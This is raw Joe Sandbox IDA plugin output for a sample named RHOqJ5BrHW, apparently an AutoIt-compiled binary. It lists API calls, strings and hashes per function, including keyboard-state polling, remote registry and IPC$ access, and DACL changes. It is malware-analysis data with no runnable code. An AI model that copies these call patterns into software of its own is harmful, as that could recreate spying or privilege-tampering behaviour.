                                      • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                      • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                      • Part of subcall function 009BABBB: RtlAllocateHeap.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                      • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                      • Part of subcall function 009BAC56: RtlAllocateHeap.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                      • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA8CB
                                    • _memset.LIBCMT ref: 009BA8E0
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA8FF
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA910
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 009BA94D
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA969
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA986
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA995
                                    • RtlAllocateHeap.KERNEL32(00000000), ref: 009BA99C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA9BD
                                    • CopySid.ADVAPI32(00000000), ref: 009BA9C4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA9F5
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BAA1B
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BAA2F
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-2391861430
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-3420473620
                                    APIs
                                    • _memset.LIBCMT ref: 009C55D7
                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009C5664
                                    • GetMenuItemCount.USER32(00A41708), ref: 009C56ED
                                    • DeleteMenu.USER32(00A41708,00000005,00000000,000000F5,?,?), ref: 009C577D
                                    • DeleteMenu.USER32(00A41708,00000004,00000000), ref: 009C5785
                                    • DeleteMenu.USER32(00A41708,00000006,00000000), ref: 009C578D
                                    • DeleteMenu.USER32(00A41708,00000003,00000000), ref: 009C5795
                                    • GetMenuItemCount.USER32(00A41708), ref: 009C579D
                                    • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C57D3
                                    • GetCursorPos.USER32(?), ref: 009C57DD
                                    • SetForegroundWindow.USER32(00000000), ref: 009C57E6
                                    • TrackPopupMenuEx.USER32(00A41708,00000000,?,00000000,00000000,00000000), ref: 009C57F9
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C5805
                                    Similarity
                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 3993528054-0
                                    APIs
                                    • _memset.LIBCMT ref: 009BA1DC
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009BA211
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009BA22D
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009BA249
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009BA273
                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009BA29B
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2A6
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 1687751970-22481851
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009F36F4,00000010,?,Bad directive syntax error,00A1DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009C25D6
                                    • LoadStringW.USER32(00000000,?,009F36F4,00000010), ref: 009C25DD
                                    • _wprintf.LIBCMT ref: 009C2610
                                    • __swprintf.LIBCMT ref: 009C2632
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009C26A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 1080873982-4153970271
                                    APIs
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009C7B42
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009C7B58
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009C7B69
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009C7B7B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009C7B8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: SendString
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 890592661-1007645807
                                    APIs
                                    • timeGetTime.WINMM ref: 009C7794
                                      • Part of subcall function 0099DC38: timeGetTime.WINMM(?,75A8B400,009F58AB), ref: 0099DC3C
                                    • Sleep.KERNEL32(0000000A), ref: 009C77C0
                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009C77E4
                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 009C7806
                                    • SetActiveWindow.USER32 ref: 009C7825
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009C7833
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 009C7852
                                    • Sleep.KERNEL32(000000FA), ref: 009C785D
                                    • IsWindow.USER32 ref: 009C7869
                                    • EndDialog.USER32(00000000), ref: 009C787A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CoInitialize.OLE32(00000000), ref: 009D034B
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009D03DE
                                    • SHGetDesktopFolder.SHELL32(?), ref: 009D03F2
                                    • CoCreateInstance.OLE32(00A0DA8C,00000000,00000001,00A33CF8,?), ref: 009D043E
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009D04AD
                                    • CoTaskMemFree.OLE32(?,?), ref: 009D0505
                                    • _memset.LIBCMT ref: 009D0542
                                    • SHBrowseForFolderW.SHELL32(?), ref: 009D057E
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009D05A1
                                    • CoTaskMemFree.OLE32(00000000), ref: 009D05A8
                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009D05DF
                                    • CoUninitialize.OLE32(00000001,00000000), ref: 009D05E1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 009C2ED6
                                    • SetKeyboardState.USER32(?), ref: 009C2F41
                                    • GetAsyncKeyState.USER32(000000A0), ref: 009C2F61
                                    • GetKeyState.USER32(000000A0), ref: 009C2F78
                                    • GetAsyncKeyState.USER32(000000A1), ref: 009C2FA7
                                    • GetKeyState.USER32(000000A1), ref: 009C2FB8
                                    • GetAsyncKeyState.USER32(00000011), ref: 009C2FE4
                                    • GetKeyState.USER32(00000011), ref: 009C2FF2
                                    • GetAsyncKeyState.USER32(00000012), ref: 009C301B
                                    • GetKeyState.USER32(00000012), ref: 009C3029
                                    • GetAsyncKeyState.USER32(0000005B), ref: 009C3052
                                    • GetKeyState.USER32(0000005B), ref: 009C3060
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 009BED1E
                                    • GetWindowRect.USER32(00000000,?), ref: 009BED30
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009BED8E
                                    • GetDlgItem.USER32(?,00000002), ref: 009BED99
                                    • GetWindowRect.USER32(00000000,?), ref: 009BEDAB
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009BEE01
                                    • GetDlgItem.USER32(?,000003E9), ref: 009BEE0F
                                    • GetWindowRect.USER32(00000000,?), ref: 009BEE20
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009BEE63
                                    • GetDlgItem.USER32(?,000003EA), ref: 009BEE71
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009BEE8E
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 009BEE9B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    APIs
                                      • Part of subcall function 0099B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0099B759,?,00000000,?,?,?,?,0099B72B,00000000,?), ref: 0099BA58
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099B72B), ref: 0099B7F6
                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 0099B88D
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 009FD8A6
                                    • 6F520860.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8D7
                                    • 6F520860.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8EE
                                    • 6F520860.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD90A
                                    • DeleteObject.GDI32(00000000), ref: 009FD91C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: F520860$Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 4208914780-0
                                    APIs
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • GetSysColor.USER32(0000000F), ref: 0099B438
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                    • String ID:
                                    • API String ID: 136442275-0
                                    APIs
                                    • CharLowerBuffW.USER32(00A1DC00,00A1DC00,00A1DC00), ref: 009CD7CE
                                    • GetDriveTypeW.KERNEL32(?,00A33A70,00000061), ref: 009CD898
                                    • _wcscpy.LIBCMT ref: 009CD8C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    APIs
                                    • __swprintf.LIBCMT ref: 009893AB
                                    • __itow.LIBCMT ref: 009893DF
                                      • Part of subcall function 009A1557: _xtow@16.LIBCMT ref: 009A1578
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf_xtow@16
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 1502193981-2263619337
                                    • Opcode ID: 48d42690ee3939a5d93ef08ded24d67039531591689bcaef808e9f2e37318b7e
                                    • Instruction ID: 0f2ce39df7d601cdba6ea408387640eebe7a7f3db81c471a444fa27aa0b7efe4
                                    • Opcode Fuzzy Hash: 48d42690ee3939a5d93ef08ded24d67039531591689bcaef808e9f2e37318b7e
                                    • Instruction Fuzzy Hash: 8D41DA71504208ABDB24EB74D941FBA77E8EF85310F24486FF18AD72D1EA35D941CB50
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009EA259
                                    • CreateCompatibleDC.GDI32(00000000), ref: 009EA260
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009EA273
                                    • SelectObject.GDI32(00000000,00000000), ref: 009EA27B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 009EA286
                                    • DeleteDC.GDI32(00000000), ref: 009EA28F
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009EA299
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009EA2AD
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009EA2B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
                                    • Instruction ID: cec5ed216dde8edf8a7fd18429379bb42b2db8acfcc964bb9baf45337fcc51ed
                                    • Opcode Fuzzy Hash: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
                                    • Instruction Fuzzy Hash: 8D316F32100159ABDF129FE5DC49FEA3B6DFF19360F110214FA29A61A0CB36EC12DB65
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 2620052-3771769585
                                    • Opcode ID: a8f794ea72cf9e84b1e4875189849412b83eb986ed562d04ae9765342b304575
                                    • Instruction ID: e2c57eca994ec47e9d994e15a8472e084a119cd4699b32b63a2585460ef10b88
                                    • Opcode Fuzzy Hash: a8f794ea72cf9e84b1e4875189849412b83eb986ed562d04ae9765342b304575
                                    • Instruction Fuzzy Hash: 26110A72904219BBDB25ABB4AC09FDA77BCEF85710F00006DF04596081EF70DE868B92
                                    APIs
                                    • _memset.LIBCMT ref: 009A5047
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __gmtime64_s.LIBCMT ref: 009A50E0
                                    • __gmtime64_s.LIBCMT ref: 009A5116
                                    • __gmtime64_s.LIBCMT ref: 009A5133
                                    • __allrem.LIBCMT ref: 009A5189
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51A5
                                    • __allrem.LIBCMT ref: 009A51BC
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51DA
                                    • __allrem.LIBCMT ref: 009A51F1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A520F
                                    • __invoke_watson.LIBCMT ref: 009A5280
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction ID: 60364858a8a8b071236c6e572301140b0c0621166099c9658600ba6c88d0d565
                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction Fuzzy Hash: 0C71E672B00F16ABE7149F78CC91BAAB3A8AF52774F164229F914D7681E770DD408BD0
                                    APIs
                                    • _memset.LIBCMT ref: 009C4DF8
                                    • GetMenuItemInfoW.USER32(00A41708,000000FF,00000000,00000030), ref: 009C4E59
